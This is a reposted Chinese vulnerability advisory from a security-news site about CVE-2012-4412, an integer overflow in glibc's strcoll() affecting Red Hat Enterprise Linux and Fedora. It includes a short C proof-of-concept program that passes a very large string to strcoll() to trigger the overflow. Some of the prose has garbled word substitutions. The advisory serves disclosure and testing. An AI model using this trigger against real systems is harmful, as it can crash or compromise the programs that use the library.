安全黑客
当前位置:安全黑客文章资讯安全漏洞最新漏洞
日期:2012-09-10 19:36:00  来源:本站整理

GNU glibc 'strcoll()'例程整数溢出漏洞 GNU glibc 'strcoll()'[最新漏洞]

赞助商链接



  本文“GNU glibc 'strcoll()'例程整数溢出漏洞 GNU glibc 'strcoll()'[最新漏洞]”是由安全黑客为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

受影响系统:
RedHat Enterprise Linux 6
RedHat Enterprise Linux 5.0
RedHat Fedora 17
RedHat Fedora 16
描写:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 55462
CVE ID: CVE-2012-4412
 
glibc是绝大大都Linux操作系统中C库的实现.
 
GNU glibc 'strcoll()'函数存在可招致缓冲区溢出的远程整数溢出漏洞,成功操纵可答应攻击者在利用受影响库的利用中履行肆意代码.
 
<*根源:Jan iankko Lieskovsky
  *>
 
测试办法:
--------------------------------------------------------------------------------
警 告
 
以下程序(办法)大概带有攻击性,仅供安全研究与讲授之用.利用者风险自负!
 
#include <locale.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
#define SIZE 429496730
 
int
main (void)
{
  char *p = malloc (1 + SIZE);
  if (setlocale (LC_COLLATE, "en_GB.UTF-8") == NULL)
    {
      puts ("setlocale failed, cannot test for overflow");
      return 0;
    }
  if (p == NULL)
    {
      puts ("malloc failed, cannot test for overflow");
      return 0;
    }
  memset (p, 'x', SIZE);
  p[SIZE] = 0;
  printf ("%d\n", strcoll (p, p));
  return 0;
}
 
倡议:
--------------------------------------------------------------------------------
厂商补钉:
 
RedHat
------
目前厂商还没有供应补钉大概进级程序,我们倡议利用此软件的用户随时关注厂商的主页以获得最新版本:
 
http://www.redhat.com/apps/support/errata/index.html

  以上是“GNU glibc 'strcoll()'例程整数溢出漏洞 GNU glibc 'strcoll()'[最新漏洞]”的内容,如果你对以上该文章内容感兴趣,你可以看看安全黑客为您推荐以下文章:

  • GNU glibc 'strcoll()'例程整数溢出漏洞 GNU glibc 'strcoll()'
  • Linux GNU Debugger "debug_gdb_scripts"加载肆意代码
  • <b>GNU/Linux发行版历年分支进化图一览</b>
  • Debian GNU/kFreebsd发行版初体验
  • WordPress Accept Signups插件email参数跨站脚本履行漏洞
  • 盗号木马isignup.sys,isignup.dll等查杀办法
  • 韩国gnuboard论坛漏洞EXP及操纵办法
  • 韩国gnuboard论坛漏洞EXP及利用办法
  • 本文地址: 与您的QQ/BBS好友分享!

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    免责条款 - 广告合作 - 下载声明 - 欢迎投稿 - 友情连接 - 网站地图 -
    Copyright © 2012-2013 www.110hack.com. All Rights Reserved .